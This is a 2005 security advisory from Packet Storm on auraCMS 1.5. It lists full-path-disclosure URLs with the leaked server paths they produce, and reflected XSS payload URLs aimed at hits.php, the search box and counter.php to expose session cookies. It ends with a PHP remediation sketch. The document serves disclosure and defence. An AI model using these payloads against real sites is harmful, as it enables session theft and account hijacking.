AuraCMS.txt

2005-03-03T00:00:00
ID PACKETSTORM:36422
Type packetstorm
Reporter y3dips
Modified 2005-03-03T00:00:00

Description

                                        
  
---------------------------------------------------------------------------  
Vulnerabilities in Aura CMS  
---------------------------------------------------------------------------  
  
Author: y3dips  
Date: January 25th, 2005  
Location: Indonesia, Jakarta  
Web: http://echo.or.id/adv/adv011-y3dips-2005.txt  
  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
auraCMS (Content Management System)  
  
version: 1.5  
date : 21 September 2004  
license: GPL - http://www.gnu.org/licenses/licenses.html#GPL  
  
Author: Arif Supriyanto - arif@ayo.kliksini.com  
http://www.semarang.tk  
http://www.ayo.kliksini.com  
http://www.auracms.opensource-indonesia.com  
  
Description:  
  
auraCMS is a PHP script package that makes it possible to build  
a website with dynamic content more easily and quickly, with no more wasted time.  
  
  
---------------------------------------------------------------------------  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
A. Full path disclosure  
  
==>> http://[site]/[aura]/?pilih=teman&id=34%60select%20all  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in  
/home/cxxo/public_html/aura/teman.php on line 9  
  
==>> http://[site]/[aura]/?pilih=hal&id=4%60tes  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in   
/home/cxxo/public_html/aura/hal.php on line 10  
  
  
==>> http://[site]/[aura]/?pilih=arsip&topik=1%60  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in   
/home/cxxo/public_html/aura/arsip.php on line 11  
  
B. Session ID  
  
This version of the CMS has two methods of authentication (session and cookies);  
the problem was found in the session method.  
  
Many variables are never declared, so an attacker can  
exploit this by supplying some "characters" and obtain a session ID in a pop-up window.  
  
  
for eXample  
  
---- hits.php -----  
  
<?  
$perintah = "SELECT * FROM counter WHERE id=1";  
$hasil = mysql_query( $perintah );  
while ($data = mysql_fetch_row($hasil)) {  
$hits=$data[3];  
}  
  
echo "<b>$hits</b>";  
  
?>  
  
-------end -------  
  
Look at the $hits variable. Do you see something interesting? Yes SIR, we've found something;  
let's give it a try.  
  
  
==>> http://[site]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
then you get the session ID  
  
Other vulnerable points:  
  
in the pencarian (search) input box  
  
+ http://[site]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search  
  
also in counter module  
  
+ http://[site]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
  
  
p.s.: Wanna know what session IDs give you? Try Google :D  
  
---------------------------------------------------------------------------  
  
Fix:  
  
found: January 25th 2005  
reported to vendor: February 15th 2005;  
vendor responded but has not yet released any patch  
published at securityfocus: March 2nd 2005  
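  
With no vendor patch available, the flaws in sections A and B can be closed in the scripts themselves. The sketch below is an added example, not auraCMS code and not from the advisory's author: the helper names are hypothetical, the request values are constructed from the URLs above, and it assumes PHP 7.1 or later. It also assumes the `hits` request parameter reaches `$hits` because register_globals is enabled on the server.

```php
<?php
// Added example: not auraCMS code. Helper names are hypothetical.
ini_set('display_errors', '0');            // section A: keep PHP warnings (and paths) off the page
ini_set('session.cookie_httponly', '1');   // section B: hide the session cookie from document.cookie

// Section A: accept an id/topik value only if it is a short run of digits,
// so input such as "34`select all" never reaches the SQL string.
function int_param(array $src, string $key): ?int
{
    $v = $src[$key] ?? null;
    if (!is_string($v) || preg_match('/\A[0-9]{1,9}\z/', $v) !== 1) {
        return null;
    }
    return (int) $v;
}

// Section B, hits.php: set $hits explicitly before use and encode on output.
// $row stands for the result of the fetch call, which is not an array when
// the query failed or returned no row.
function render_hits($row): string
{
    $hits = 0;
    if (is_array($row) && isset($row[3])) {
        $hits = (int) $row[3];
    }
    return '<b>' . htmlspecialchars((string) $hits, ENT_QUOTES, 'UTF-8') . '</b>';
}

// Section B, search box and counter: encode any request text that is echoed.
function html_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Constructed request values modelled on the URLs in the advisory.
$get = [
    'id'    => '34`select all',
    'query' => '<script>alert(document.cookie)</script>',
];
var_dump(int_param($get, 'id'));
var_dump(int_param(['id' => '34'], 'id'));
echo render_hits(false), "\n";
echo render_hits([1, 'x', 'y', '1523']), "\n";
echo html_text($get['query']), "\n";
```

In the real scripts, a null from int_param should end the request before any query is built.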
  
  
  
---------------------------------------------------------------------------  
  
Shoutz:  
~~~~~~~  
  
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous  
~ newbie_hacker@yahoogroups.com ,http://forum.ehco.or.id  
~ #e-c-h-o@DALNET  
  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
y3dips || echo|staff || y3dips[at]gmail[dot]com  
Homepage: http://y3dips.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  
  